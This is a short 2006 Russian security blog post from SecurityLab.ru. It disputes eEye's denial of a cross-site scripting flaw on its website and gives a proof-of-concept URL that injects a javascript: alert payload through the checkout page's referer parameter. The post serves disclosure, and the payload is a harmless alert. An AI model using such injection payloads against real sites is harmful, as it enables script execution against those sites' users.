XSS на eEye.com

21 августа, 2006 4725

Security

Компания eEye утверждает что на их сайте не было XSS. Собственно, а что следовало ожидать от компании, которая не способна защитить свой web стайт?

Example:
Follow the link and press the "Back" button.

www.eeye.com//~apps/shop/checkout.asp?referer=javascript: alert('www.securitylab.ru')&rnd=060816.123112.125229.323

Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.

Мая

// Дедлайн

Standoff Talks · CFP открыт

Не держи хороший кейс по ИБ в столе

Расскажи на Standoff Talks про атаку, защиту или багбаунти. 18–19 июня · Кибердом. CFP открыт до 13 мая.

Подать заявку →

Реклама, АО «Позитив Текнолоджиз», ИНН 7718668887, 18+